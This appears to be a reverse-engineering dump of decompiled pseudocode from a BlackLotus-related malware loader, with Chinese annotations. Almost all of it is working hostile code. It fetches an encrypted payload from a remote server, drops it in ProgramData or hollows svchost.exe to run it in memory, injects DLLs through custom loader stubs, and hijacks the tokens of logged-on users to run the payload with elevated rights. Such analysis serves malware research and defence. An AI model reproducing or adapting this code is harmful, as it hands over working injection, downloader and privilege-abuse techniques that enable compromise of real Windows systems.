// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
Handle = 0i64;
v4 = 0;
Heap = (ThreadParameter *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x40ui64);
parameter = Heap;
if ( Heap )
{
p_datasz = (ULONG *)&Heap->datasz;
Data_by_auth_token = getData_by_auth_token_140004108(httpst, wsvalue, &Heap->datasz);
parameter->data = Data_by_auth_token;
if ( Data_by_auth_token )
{
if ( *p_datasz && !(unsigned int)sys_140006980(wsvalue, parameter) )
{
v9 = *p_datasz;
*(_WORD *)¶meter->Method = *wsvalue->Method;
parameter->isX86 = isPEx86_140003C1C((__int64)parameter->data, v9);
FileType = wsvalue->FileType;
// FileType-->dll
if ( *FileType != 'd' || FileType[1] != 'l' || (v11 = FileType[2] == 'l', v12 = 1, !v11) )
v12 = 0;
parameter->isDll = v12;
v13 = wsvalue->FileType;
if ( *v13 != 'e' || v13[1] != 'x' || (v11 = v13[2] == 'e', v14 = 1, !v11) )
v14 = 0;
parameter->isEXE = v14;
parameter->isUser3or5 = 0;
if ( *wsvalue->Method == '2' ) // 保存文件
{
// \??\%c:\ProgramData\%s.%s
// drivenumber wsvalue->File, wsvalue->FileType
v15 = savefile_1400088C4(parameter->data, *p_datasz, wsvalue);
parameter->path = v15;
if ( !v15 )
goto END;
if ( !parameter->isEXE )
{ // dll
v16 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x64ui64);
parameter->cmd_prefix = v16;
if ( !v16 )
goto END;
// regsvr32 /s
v17 = word_14000B5A0;
if ( !parameter->isDll ) // isDll
// cmd /c
v17 = word_14000B5C0;
v18 = deobfuscate_wstring((WORD *)v17, parameter->isDll != 0 ? 13 : 8, 1);
cmd_prefix = parameter->cmd_prefix;
v20 = '2';
do
{
if ( v20 == 0xFFFFFFFF80000034ui64 )
break;
if ( !*v18 )
break;
*cmd_prefix++ = *v18++;
--v20;
}
while ( v20 );
v21 = cmd_prefix - 1;
if ( v20 )
v21 = cmd_prefix;
*v21 = 0;
}
}
else
{ // 内存加载,不保存文件
v22 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x208ui64);
parameter->path = v22;
if ( !v22 )
goto END;
*parameter->path = ret_disk_drivenumber_140008000();
// :\Windows\System32\svchost.exe
v23 = x64svchost_14000B5E0;
if ( parameter->isX86 ) // isx86
// :\Windows\SysWOW64\svchost.exe
v23 = x86svchost_14000B620;
v24 = deobfuscate_wstring((WORD *)v23, 0x1Fu, 1);
wscat(parameter->path, 260i64, (__int64)v24);
}
cmd_line_b64dec = wsvalue->cmd_line_b64dec;
if ( *cmd_line_b64dec == 32 )
{
v26 = wcslen(cmd_line_b64dec);
v27 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v26 + 1));
parameter->cmdline = v27;
if ( !v27 )
goto END;
v28 = wcslen(wsvalue->cmd_line_b64dec);
wcsncpy_0(parameter->cmdline, (const wchar_t *)(unsigned int)(v28 + 1), (size_t)wsvalue->cmd_line_b64dec);
}
v4 = 1;
if ( *wsvalue->User != '2' )
{
if ( *wsvalue->User != '3' )
{
if ( *wsvalue->User != '4' )
{
if ( *wsvalue->User != '5' )
{
launch_14000691C(parameter); // 0,1,>5
goto END;
}
parameter->isUser3or5 = 1; // 5
}
lpStartAddress = privilege_4_5_140006804;// 4 5
goto LABEL_42;
}
parameter->isUser3or5 = 1; // 3
}
lpStartAddress = AdminPrivilege_2_3_140006640;// user2 3
LABEL_42:
NtCreateThreadEx(
&Handle,
0x1FFFFFu,
0i64,
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
lpStartAddress,
parameter,
0,
0i64,
0i64,
0i64,
0i64);
}
}
}
END:
if ( Handle )
NtClose(Handle);
if ( !v4 )
{
if ( parameter )
free_140007354(parameter);
}
}
getData_by_auth_token_140004108
PVOID __fastcall getData_by_auth_token_140004108(HttpST *httpst, WsValue *wsvalue, _DWORD *decsz)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v32 = 4;
v37 = 0;
auth_token = wsvalue->auth_token;
v5 = 0i64;
Data = 0i64;
outsz = 0x2100000000i64;
hRequest = 0i64;
v30 = 0;
if ( (unsigned int)wcslen(auth_token) < 0x32 )
{
// {"auth_token":"%s"}
v9 = deobfuscate_wstring(word_14000AFA0, 0x14u, 1);
snwprintf(Str, 0x64u, v9, wsvalue->auth_token);
wcslen(Str);
v10 = rsaenc_base64_140001370(Str);
if ( v10 )
{
v11 = urlenc_140005498(v10, 1);
v12 = (char *)v11;
if ( v11 )
{
v13 = strlen(v11) + 20;
Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v13);
if ( Heap )
{
v15 = deobfuscate_bytes(byte_14000AFD0, 0xAu, 1);
if ( v13 )
{
if ( v13 <= 0x7FFFFFFF )
{
v16 = v13;
v17 = Heap;
v18 = v15 - (BYTE *)Heap;
do
{
if ( !(2147483646 - v13 + v16) )
break;
v19 = v17[v18];
if ( !v19 )
break;
*v17++ = v19;
--v16;
}
while ( v16 );
v20 = v17 - 1;
if ( v16 )
v20 = v17;
*v20 = 0;
}
else
{
*Heap = 0;
}
}
strcat(Heap, (const char *)v13);
v21 = httpst->DataST_20.sslflag != 0 ? 8388864 : 256;
v22 = deobfuscate_wstring(POST_14000AFE0, 5u, 1);
v23 = WinHttpOpenRequest(httpst->hConnect, v22, httpst->DataST_20.pwszObjectName, 0i64, 0i64, 0i64, v21);
hRequest = v23;
if ( v23 )
{
v31 = 13056;
if ( WinHttpSetOption(v23, 0x1Fu, &v31, 4u) )
{
// Content-Type: application/x-www-form-urlencoded
v24 = deobfuscate_wstring(Content_Type_14000AFF0, 0x30u, 1);
v25 = strlen(Heap);
v26 = strlen(Heap);
if ( WinHttpSendRequest(hRequest, v24, 0xFFFFFFFF, Heap, v26, v25, 0i64) )
{
if ( WinHttpReceiveResponse(hRequest, 0i64) )
{
if ( WinHttpQueryHeaders(hRequest, 0x20000013u, 0i64, &v37, &v32, 0i64) )
{
if ( v37 == 200 )
{
Data = (CHAR *)get_HttpReadData(hRequest, (unsigned int *)&outsz);
if ( Data )
{
v27 = outsz;
if ( (_DWORD)outsz )
{
if ( CryptStringToBinaryW(wsvalue->aes_key, 0, 1u, v33, (DWORD *)&outsz + 1, 0i64, 0i64) )
{
if ( HIDWORD(outsz) == 32 )
{
v5 = AESCBC256_dec_recvdata_140001060(Data, v33, v27, &v30);
if ( v5 )
*decsz = v30;
}
}
}
}
}
}
}
}
}
}
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v12);
if ( Heap )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
if ( Data )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Data);
if ( hRequest )
WinHttpCloseHandle(hRequest);
}
}
}
return v5;
}
sys_140006980
sys文件通过BlackLotus 内核进行加载
__int64 __fastcall sys_140006980(WsValue *wsvalue, ThreadParameter *Parameter)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
FileType = wsvalue->FileType;
v3 = 0;
// sys
if ( *(_DWORD *)FileType == 0x790073 && FileType[2] == 0x73 )
{
v3 = 1;
Heap = (sectiondata *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, (unsigned int)Parameter->datasz + 16i64);
if ( Heap )
{
if ( (unsigned int)isTargetPEType_140003F60((__int64)Parameter->data, Parameter->datasz) )
{
Heap->tag[0] = 'I';
Heap->datasz = Parameter->datasz;
strcpyWs_14000102C(Heap->data, (wchar_t *)Parameter->data, (unsigned int)Parameter->datasz);
evnet_section_2sys_1400082F0(Heap);
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
}
}
return v3;
}
savefile_1400088C4
保存文件到ProgramData目录
_WORD *__fastcall savefile_1400088C4(void *data, ULONG sz, WsValue *wsvalue)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
FileHandle = 0i64;
v6 = 0i64;
// \??\%c:\ProgramData\%s.%s
v7 = deobfuscate_wstring(word_14000B690, 0x1Au, 1);
v8 = ret_disk_drivenumber_140008000(); // 获取盘符
v9 = v7;
v10 = 260i64;
snwprintf(&v20, 0x104u, v9, v8, wsvalue->File, wsvalue->FileType);
RtlInitUnicodeString(&v17, &v20);
ObjectAttributes.Length = 48;
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Attributes = 64;
ObjectAttributes.ObjectName = &v17;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
if ( NtCreateFile(&FileHandle, 0x120116u, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 2u, 0, 0x860u, 0i64, 0) >= 0
&& NtWriteFile(FileHandle, 0i64, 0i64, 0i64, &IoStatusBlock, data, sz, 0i64, 0i64) >= 0 )
{
Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x20Aui64);
v6 = Heap;
if ( Heap )
{
v12 = Heap;
v13 = (char *)(v21 - (char *)Heap);
do
{
if ( v10 == 0xFFFFFFFF80000106ui64 )
break;
v14 = *(_WORD *)((char *)v12 + (_QWORD)v13);
if ( !v14 )
break;
*v12++ = v14;
--v10;
}
while ( v10 );
v15 = v12 - 1;
if ( v10 )
v15 = v12;
*v15 = 0;
}
}
if ( FileHandle )
NtClose(FileHandle);
return v6;
}
launch_14000691C
void __fastcall launch_14000691C(ThreadParameter *parameter)
{
bool v1; // zf
struct _PROCESS_INFORMATION lpProcessInformation; // [rsp+20h] [rbp-28h] BYREF
// user1
v1 = *(_WORD *)¶meter->Method == '1'; // Process Hollowing
memset(&lpProcessInformation, 0, sizeof(lpProcessInformation));
if ( v1 )
{
if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(0i64, 0i64, parameter, &lpProcessInformation) )
load_Terminate_14000368C(parameter, &lpProcessInformation);
}
else if ( *(_WORD *)¶meter->Method == '2' )// run
{
Create_ProcessAsUserW_method2_140006E0C(0i64, 0i64, parameter);
}
free_140007354(parameter);
}
Create_ProcessAsUserW_method1_suspended_140006F88
__int64 __fastcall Create_ProcessAsUserW_method1_suspended_140006F88(
HANDLE hToken,
void *lpEnvironment,
ThreadParameter *parameter,
struct _PROCESS_INFORMATION *lpProcessInformation)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v7 = 0;
memset(&lpStartupInfo, 0, sizeof(lpStartupInfo));
v9 = lpCommandLine;
v10 = 0x212i64;
v11 = (char *)parameter->path - (char *)lpCommandLine;
do
{
if ( v10 == 0xFFFFFFFF80000214ui64 )
break;
v12 = *(wchar_t *)((char *)v9 + v11);
if ( !v12 )
break;
*v9++ = v12;
--v10;
}
while ( v10 );
cmdline = parameter->cmdline;
v14 = v9 - 1;
if ( v10 )
v14 = v9;
*v14 = 0;
if ( cmdline )
wscat(lpCommandLine, 0x212i64, (__int64)cmdline);
if ( CreateProcessAsUserW(
hToken,
0i64,
lpCommandLine,
0i64,
0i64,
0,
0x2000424u, // CREATE_PRESERVE_CODE_AUTHZ_LEVEL
// 0x02000000
// CREATE_UNICODE_ENVIRONMENT
// 0x00000400
// #define NORMAL_PRIORITY_CLASS 0x00000020
// CREATE_SUSPENDED
// 0x00000004
lpEnvironment,
0i64,
&lpStartupInfo,
lpProcessInformation) )
{
return 1;
}
return v7;
}
load_Terminate_14000368C
NTSTATUS __fastcall load_Terminate_14000368C(
ThreadParameter *parameter,
struct _PROCESS_INFORMATION *lpProcessInformation)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
data = (char *)parameter->data;
if ( !(unsigned int)isTargetPEType_140003F60((__int64)data, parameter->datasz)
|| ((isDll = parameter->isDll, ntheader = (_IMAGE_NT_HEADERS *)&data[*((int *)data + 15)], parameter->isX86) ? (!isDll ? (result = x86exe_hollow_140003D1C(lpProcessInformation, data, ntheader)) : (result = x86dll_140003728(lpProcessInformation, data, ntheader))) : !isDll ? (result = x64exe_hollow_140003E38(lpProcessInformation, data, (_IMAGE_NT_HEADERS64 *)ntheader)) : (result = x64dll_140003890(lpProcessInformation, data, (_IMAGE_NT_HEADERS64 *)ntheader)),
!result) )
{
result = NtTerminateProcess(lpProcessInformation->hProcess, -1);
}
if ( lpProcessInformation->hProcess )
result = NtClose(lpProcessInformation->hProcess);
hThread = lpProcessInformation->hThread;
if ( hThread )
return NtClose(hThread);
return result;
}
__int64 __fastcall isTargetPEType_140003F60(__int64 a1, unsigned int sz)
{
unsigned int v2; // ebx
_IMAGE_NT_HEADERS64 *v3; // rdi
__int64 v4; // rax
v2 = 0;
if ( sz >= 0x210 && *(_WORD *)a1 == 0x5A4D )
{
v3 = (_IMAGE_NT_HEADERS64 *)(a1 + *(int *)(a1 + 0x3C));
if ( v3->Signature == 0x4550 )
{
if ( (unsigned int)isPEx86_140003C1C(a1, sz) )
{ // x86
v4 = (__int64)&v3->OptionalHeader.DataDirectory[12];// struct IMAGE_DATA_DIRECTORY COMRuntimedescriptor
if ( HIDWORD(v3->OptionalHeader.SizeOfHeapReserve) <= 0xE )
v4 = 0i64;
}
else // x64
{
if ( v3->OptionalHeader.NumberOfRvaAndSizes <= 14 )
return 1;
v4 = (__int64)&v3->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR];// struct IMAGE_DATA_DIRECTORY COMRuntimedescriptor
}
if ( !v4 || !*(_DWORD *)v4 )
return 1; // NOT .NET executable
}
}
return v2;
}
__int64 __fastcall x86exe_hollow_140003D1C(
struct _PROCESS_INFORMATION *lpProcessInformation,
char *data,
_IMAGE_NT_HEADERS *ntheader32)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v6 = 0;
memset(&v9.Dr0, 0, 0x2C8u);
hThread = lpProcessInformation->hThread;
ProcessInformation = 0i64;
v10 = 0i64;
v9.ContextFlags = CONTEXT_FULL;
if ( RtlWow64GetThreadContext(hThread, &v9) >= 0
&& NtQueryInformationProcess(lpProcessInformation->hProcess, ProcessWow64Information, &ProcessInformation, 8u, 0i64) >= 0 )
{
v10 = mapPE32_140003A00(lpProcessInformation, data, 0i64, ntheader32, 1);
if ( v10 )
{
if ( NtWriteVirtualMemory(lpProcessInformation->hProcess, (PVOID)(ProcessInformation + 8), &v10, 4ui64, 0i64) >= 0 )
{
v9.Eax = (_DWORD)v10 + ntheader32->OptionalHeader.AddressOfEntryPoint;
if ( RtlWow64SetThreadContext(lpProcessInformation->hThread, &v9) >= 0
&& NtResumeThread(lpProcessInformation->hThread, 0i64) >= 0 )
{
return 1;
}
}
}
}
return v6;
}
__int64 __fastcall x86dll_140003728(
struct _PROCESS_INFORMATION *lpProcessInformation,
char *pedata,
_IMAGE_NT_HEADERS *ntheader32)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
RegionSize = 4096i64;
Handle = 0i64;
BaseAddress = 0i64;
memset(&dll32st, 0, sizeof(dll32st));
v4 = (_IMAGE_NT_HEADERS *)&loaddll_stubpe_data[dword_14000D04C];
v7 = 0;
v8 = mapPE32_140003A00(lpProcessInformation, pedata, 0i64, ntheader32, 0);
if ( v8 )
{
dll32st.targetpe_ntheader = (_DWORD)v8 + *((_DWORD *)pedata + 15);
VirtualAddress = ntheader32->OptionalHeader.DataDirectory[1].VirtualAddress;// 导入表
dll32st.targetpe_addr = (int)v8;
dll32st.targetpe_importaddr = (_DWORD)v8 + VirtualAddress;
v10 = mapPE32_140003A00(lpProcessInformation, loaddll_stubpe_data, 0i64, v4, 0);
if ( v10 )
{
if ( NtAllocateVirtualMemory(lpProcessInformation->hProcess, &BaseAddress, 0i64, &RegionSize, 0x3000u, 4u) >= 0
&& (unsigned __int64)BaseAddress <= 0xFFFFFFFF
// int __stdcall start(DLL32ST *a1)
// {
// // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// targetpe_importaddr = (_IMAGE_IMPORT_DESCRIPTOR *)a1->targetpe_importaddr;
// if ( targetpe_importaddr )
// {
// // KERNEL32.DLL
// dllbase = get_dllbase(0x536CD652); // KERNEL32.DLL BaseNameHashValue : 0x536cd652
// if ( !dllbase )
// dllbase = get_dllbase(0x8F7EE672); // kernel32.dll-->0x8f7ee672
// a1->GetProcAddress = get_proc_address_by_hash((int)dllbase, 0x80E96588);// GetProcAddress
// a1->LoadLibraryA = get_proc_address_by_hash((int)dllbase, 0xDF2BBBEC);// LoadLibraryA
// while ( targetpe_importaddr->DUMMYUNIONNAME.Characteristics )
// {
// OriginalFirstThunk = (_IMAGE_THUNK_DATA32 *)(a1->targetpe_addr
// + targetpe_importaddr->DUMMYUNIONNAME.Characteristics);
// v11 = (_IMAGE_THUNK_DATA32 *)(a1->targetpe_addr + targetpe_importaddr->FirstThunk);
// v10 = ((int (__stdcall *)(DWORD))a1->LoadLibraryA)(a1->targetpe_addr + targetpe_importaddr->Name);
// if ( !v10 )
// return 1;
// Characteristics = OriginalFirstThunk->u1.ForwarderString;
// if ( OriginalFirstThunk->u1.ForwarderString )
// {
// v12 = (DLL32ST *)((char *)v11 - (char *)OriginalFirstThunk);
// do
// {
// v6 = Characteristics >= 0 ? Characteristics + a1->targetpe_addr + 2 : (unsigned __int16)Characteristics;
// v7 = ((int (__stdcall *)(int, int))a1->GetProcAddress)(v10, v6);
// if ( !v7 )
// return 1;
// *(DWORD *)((char *)&OriginalFirstThunk->u1.ForwarderString + (_DWORD)v12) = v7;
// ++OriginalFirstThunk;
// Characteristics = OriginalFirstThunk->u1.ForwarderString;
// }
// while ( OriginalFirstThunk->u1.ForwarderString );
// }
// ++targetpe_importaddr;
// }
// }
// dllmain = a1->targetpe_ntheader->OptionalHeader.AddressOfEntryPoint;
// if ( dllmain )
// // BOOL WINAPI DllMain(
// // HINSTANCE hinstDLL, // handle to DLL module
// // DWORD fdwReason, // reason for calling function
// // LPVOID lpvReserved ) // reserved
// ((void (__stdcall *)(int, int, _DWORD))(dllmain + a1->targetpe_addr))(a1->targetpe_addr, 1, 0);
// return 1;
// }
&& NtWriteVirtualMemory(lpProcessInformation->hProcess, BaseAddress, &dll32st, 0x14ui64, 0i64) >= 0
&& NtCreateThreadEx(
&Handle,
0x1FFFFFu,
0i64,
lpProcessInformation->hProcess,
&v10[v4->OptionalHeader.AddressOfEntryPoint],
BaseAddress,
0,
0i64,
0i64,
0i64,
0i64) >= 0 )
{
v7 = 1;
}
}
}
if ( Handle )
NtClose(Handle);
return v7;
}
__int64 __fastcall x64exe_hollow_140003E38(
struct _PROCESS_INFORMATION *lpProcessInformation,
char *data,
_IMAGE_NT_HEADERS64 *ntheader64)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v6 = 0;
memset(&v11, 0, sizeof(v11));
hThread = lpProcessInformation->hThread;
v11.ContextFlags = CONTEXT_FULL;
memset(ProcessInformation_8, 0, sizeof(ProcessInformation_8));
if ( NtGetContextThread(hThread, &v11) >= 0
&& NtQueryInformationProcess(
lpProcessInformation->hProcess,
ProcessBasicInformation,
ProcessInformation_8,
0x30u,
0i64) >= 0 )
{
v12 = mapPE64_140003B14(lpProcessInformation, data, 0i64, ntheader64, 1);
if ( v12 )
{
if ( NtWriteVirtualMemory(
lpProcessInformation->hProcess,
(PVOID)(ProcessInformation_8[1] + 16i64),
&v12,
8ui64,
0i64) >= 0 )
{
v8 = lpProcessInformation->hThread;
v11.Rcx = (DWORD64)&v12[ntheader64->OptionalHeader.AddressOfEntryPoint];
if ( NtSetContextThread(v8, &v11) >= 0 && NtResumeThread(lpProcessInformation->hThread, 0i64) >= 0 )
return 1;
}
}
}
return v6;
}
__int64 __fastcall x64dll_140003890(
struct _PROCESS_INFORMATION *lpProcessInformation,
char *data,
_IMAGE_NT_HEADERS64 *ntheader64)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
RegionSize = 4096i64;
Handle = 0i64;
BaseAddress = 0i64;
memset(&Buffer, 0, sizeof(Buffer));
v6 = 0;
v7 = mapPE64_140003B14(lpProcessInformation, data, 0i64, ntheader64, 0);
if ( v7 )
{
Buffer.targetpe_addr = v7;
Buffer.targetpe_ntheader64 = (_IMAGE_NT_HEADERS64 *)&v7[*((int *)data + 15)];
hProcess = lpProcessInformation->hProcess;
Buffer.targetpe_importaddr = (_IMAGE_IMPORT_DESCRIPTOR *)&v7[ntheader64->OptionalHeader.DataDirectory[1].VirtualAddress];
Buffer.LoadLibraryA = LoadLibraryA;
Buffer.GetProcAddress = GetProcAddress;
if ( NtAllocateVirtualMemory(hProcess, &BaseAddress, 0i64, &RegionSize, 0x3000u, 0x40u) >= 0
&& NtWriteVirtualMemory(lpProcessInformation->hProcess, BaseAddress, &Buffer, 0x28ui64, 0i64) >= 0
&& NtWriteVirtualMemory(
lpProcessInformation->hProcess,
(char *)BaseAddress + 0x28,
dllload_stub_140003C54,
0xC6ui64,
0i64) >= 0
&& NtCreateThreadEx(
&Handle,
0x1FFFFFu,
0i64,
lpProcessInformation->hProcess,
(char *)BaseAddress + 40,
BaseAddress,
0,
0i64,
0i64,
0i64,
0i64) >= 0 )
{
v6 = 1;
}
}
if ( Handle )
NtClose(Handle);
return v6;
}
Create_ProcessAsUserW_method2_140006E0C
__int64 __fastcall Create_ProcessAsUserW_method2_140006E0C(
HANDLE hToken,
void *lpEnvironment,
ThreadParameter *parameter)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
memset(&lpProcessInformation, 0, sizeof(lpProcessInformation));
memset(&lpStartupInfo, 0, sizeof(lpStartupInfo));
v6 = lpCommandLine;
v7 = 0x212i64;
if ( parameter->isEXE )
{
v8 = (char *)parameter->path - (char *)lpCommandLine;
do
{
if ( v7 == 0xFFFFFFFF80000214ui64 )
break;
v9 = *(wchar_t *)((char *)v6 + v8);
if ( !v9 )
break;
*v6++ = v9;
--v7;
}
while ( v7 );
v10 = v6 - 1;
if ( v7 )
v10 = v6;
*v10 = 0;
}
else
{
v11 = (char *)parameter->cmd_prefix - (char *)lpCommandLine;
do
{
if ( v7 == -2147483116 )
break;
v12 = *(wchar_t *)((char *)v6 + v11);
if ( !v12 )
break;
*v6++ = v12;
--v7;
}
while ( v7 );
path = parameter->path;
v14 = v6 - 1;
if ( v7 )
v14 = v6;
*v14 = 0;
wscat(lpCommandLine, 0x212i64, (__int64)path);
}
cmdline = parameter->cmdline;
if ( cmdline && !parameter->isDll )
wscat(lpCommandLine, 0x212i64, (__int64)cmdline);
v16 = CreateProcessAsUserW(
hToken,
0i64,
lpCommandLine,
0i64,
0i64,
0,
0xA000420u, // CREATE_NO_WINDOW
// 0x08000000
// CREATE_PRESERVE_CODE_AUTHZ_LEVEL
// 0x02000000
// CREATE_UNICODE_ENVIRONMENT
// 0x00000400
// #define NORMAL_PRIORITY_CLASS 0x00000020
lpEnvironment,
0i64,
&lpStartupInfo,
&lpProcessInformation);
if ( v16 )
{
NtClose(lpProcessInformation.hProcess);
NtClose(lpProcessInformation.hThread);
}
return v16;
}
privilege_4_5_140006804
__int64 __fastcall privilege_4_5_140006804(ThreadParameter *parameter)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
Handle = 0i64;
v9 = 0i64;
memset(&ProcessInformation, 0, sizeof(ProcessInformation));
while ( 1 )
{
do
{
Sleep(1000u);
SessionId = getSessionId_140007648();
}
while ( !SessionId );
if ( !WTSQueryUserToken(SessionId, &Handle) )
break;
if ( (unsigned int)isAdmin_14000879C(Handle) || !parameter->isUser3or5 )// admin或者2,4
{
if ( CreateEnvironmentBlock(&v9, Handle, 1) )
{
LinkedToken = getLinkedToken_1400076B4(Handle);
if ( *(_WORD *)¶meter->Method == '1' )
{
hToken = Handle;
if ( LinkedToken )
hToken = LinkedToken;
if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(
hToken,
v9,
parameter,
&ProcessInformation) )
load_Terminate_14000368C(parameter, &ProcessInformation);
}
else if ( *(_WORD *)¶meter->Method == '2' )
{
v4 = Handle;
if ( LinkedToken )
v4 = LinkedToken;
Create_ProcessAsUserW_method2_140006E0C(v4, v9, parameter);
}
}
break;
}
NtClose(Handle);
Handle = 0i64;
}
if ( v9 )
DestroyEnvironmentBlock(v9);
if ( Handle )
NtClose(Handle);
if ( parameter )
free_140007354(parameter);
return 0i64;
}
__int64 getSessionId_140007648()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
SessionId = 0;
count = 0;
pSessions = 0i64;
if ( WTSEnumerateSessionsW(0i64, 0, 1u, &pSessions, &count) )
{
i = 0;
if ( count )
{
while ( pSessions[i].State )
{ // typedef enum _WTS_CONNECTSTATE_CLASS {
// WTSActive, // User logged on to WinStation
// WTSConnected, // WinStation connected to client
// WTSConnectQuery, // In the process of connecting to client
// WTSShadow, // Shadowing another WinStation
// WTSDisconnected, // WinStation logged on without client
// WTSIdle, // Waiting for client to connect
// WTSListen, // WinStation is listening for connection
// WTSReset, // WinStation is being reset
// WTSDown, // WinStation is down due to error
// WTSInit, // WinStation in initialization
// } WTS_CONNECTSTATE_CLASS;
if ( ++i >= count )
goto LABEL_7;
}
SessionId = pSessions[i].SessionId;
}
LABEL_7:
WTSFreeMemory(pSessions);
}
return SessionId;
}
__int64 __fastcall isAdmin_14000879C(HANDLE TokenHandle)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = 0;
v11 = 1280;
TokenInformationLength = 0;
Buf1 = 0;
NtQueryInformationToken(TokenHandle, 2, 0i64, 0, &TokenInformationLength);
Heap = (void **)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, TokenInformationLength);
if ( Heap )
{
if ( NtQueryInformationToken(TokenHandle, 2, Heap, TokenInformationLength, &TokenInformationLength) >= 0 )
{
v4 = *(_DWORD *)Heap;
if ( *(_DWORD *)Heap )
{
v5 = Heap + 1;
while ( 1 )
{
v6 = *v5;
v5 += 2;
if ( *RtlSubAuthorityCountSid(v6) == 2
&& *RtlSubAuthoritySid(v6, 0) == SECURITY_BUILTIN_DOMAIN_RID
&& *RtlSubAuthoritySid(v6, 1u) == DOMAIN_ALIAS_RID_ADMINS )
{
v7 = RtlIdentifierAuthoritySid(v6);
if ( !memcmp(&Buf1, v7, 6u) )
break;
}
if ( !--v4 )
return v1;
}
return 1;
}
}
}
else
{
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0i64);
}
return v1;
}
AdminPrivilege_2_3_140006640
__int64 __fastcall AdminPrivilege_2_3_140006640(ThreadParameter *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
ppSessionInfo = 0i64;
Environment = 0i64;
memset(usernames, 0, sizeof(usernames));
v11 = 0;
while ( WTSEnumerateSessionsW(0i64, 0, 1u, &ppSessionInfo, &Count) )
{
if ( v11 >= 50 )
break;
memset(&ProcessInformation, 0, sizeof(ProcessInformation));
memset(&v8, 0, sizeof(v8));
Sleep(0x1388u);
sessionid = GetLogUser_140007558(ppSessionInfo, Count, usernames, &v11);
if ( sessionid && WTSQueryUserToken(sessionid, &Handle) )
{
if ( (!a1->isUser3or5 || (unsigned int)isAdmin_14000879C(Handle))
&& CreateEnvironmentBlock(&Environment, Handle, 1) )
{
if ( (unsigned int)isAdmin_14000879C(Handle) )
{
LinkedToken = getLinkedToken_1400076B4(Handle);
v8 = LinkedToken;
}
else
{
LinkedToken = v8;
}
if ( *(_WORD *)&a1->Method == '1' )
{
v4 = Handle;
if ( LinkedToken )
v4 = LinkedToken;
if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(v4, Environment, a1, &ProcessInformation) )
load_Terminate_14000368C(a1, &ProcessInformation);
}
else if ( *(_WORD *)&a1->Method == 50 )
{
v5 = Handle;
if ( LinkedToken )
v5 = LinkedToken;
Create_ProcessAsUserW_method2_140006E0C(v5, Environment, a1);
}
DestroyEnvironmentBlock(Environment);
}
NtClose(Handle);
}
WTSFreeMemory(ppSessionInfo);
}
if ( a1 )
free_140007354(a1);
return 0i64;
}
__int64 __fastcall GetLogUser_140007558(PWTS_SESSION_INFOW a1, unsigned int a2, _DWORD *username, _DWORD *pi)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
SessionId = 0;
Str = 0i64;
v9 = 0;
if ( a2 )
{
v10 = a1;
do
{
if ( WTSQuerySessionInformationW(0i64, v10->SessionId, WTSUserName, &Str, &v18) )
{
if ( (unsigned int)wcslen(Str) )
{
v11 = w_hash_140005294(Str);
v12 = 0;
if ( !*pi )
goto LABEL_14;
v13 = (unsigned int)*pi;
v14 = username;
do
{
if ( v11 == *v14++ )
v12 = 1;
--v13;
}
while ( v13 );
if ( !v12 )
{
LABEL_14:
SessionId = a1[v9].SessionId;
username[(*pi)++] = w_hash_140005294(Str);
return SessionId;
}
}
WTSFreeMemory(Str);
}
++v9;
++v10;
}
while ( v9 < a2 );
}
return SessionId;
}
HANDLE __fastcall getLinkedToken_1400076B4(void *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = 0i64;
v4.LinkedToken = 0i64;
v3 = 0;
